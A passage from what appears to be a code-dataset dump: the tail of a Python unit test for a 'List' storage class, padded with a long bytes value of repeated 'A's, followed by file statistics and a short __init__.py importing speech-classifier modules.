b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
800000)]
f = List("test", b"bla")
self.assertEqual([i for i in f], expected)
def test_length(self):
f = List("test")
self.assertEqual(f.length(), 515)
self.assertEqual(len(list(f)), f.length())
def test_default(self):
l = List("test", default=b'Test')
self.assertEqual(first(l), Value(b'Test'))
if __name__ == '__main__':
main()
| 113.39653
| 133
| 0.705812
| 7,033
| 176,445
| 17.70482
| 0.082468
| 0.891791
| 0.901484
| 1.780626
| 0.952674
| 0.947935
| 0.942546
| 0.935833
| 0.9327
| 0.9294
| 0
| 0.02018
| 0.230491
| 176,445
| 1,555
| 134
| 113.469453
| 0.896904
| 0.009176
| 0
| 0.802372
| 0
| 0.030962
| 0.703101
| 0.67521
| 0
| 1
| 0.000051
| 0
| 0.003294
| 1
| 0.002635
| false
| 0.01581
| 0.003953
| 0
| 0.007246
| 0.001318
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
d705d67c509c0b07fa068e7903002176ba749533
| 190
|
py
|
Python
|
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | 3
|
2020-12-15T02:40:43.000Z
|
2021-01-14T02:32:13.000Z
|
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | null | null | null |
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | 4
|
2021-01-07T05:41:38.000Z
|
2021-04-07T08:02:22.000Z
|
from at_speech.classifier.sklearn_lr import SLLRLiblinear, SLLRSag
from at_speech.classifier.cnn import CNNClassifier
from at_speech.classifier.thinresnet34_cls import ThinResnet34Classifier
| 63.333333
| 72
| 0.9
| 24
| 190
| 6.916667
| 0.583333
| 0.108434
| 0.216867
| 0.39759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.063158
| 190
| 3
| 72
| 63.333333
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7072ef4909e6f6490a0f153055cb3015fd902f7
| 168
|
py
|
Python
|
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
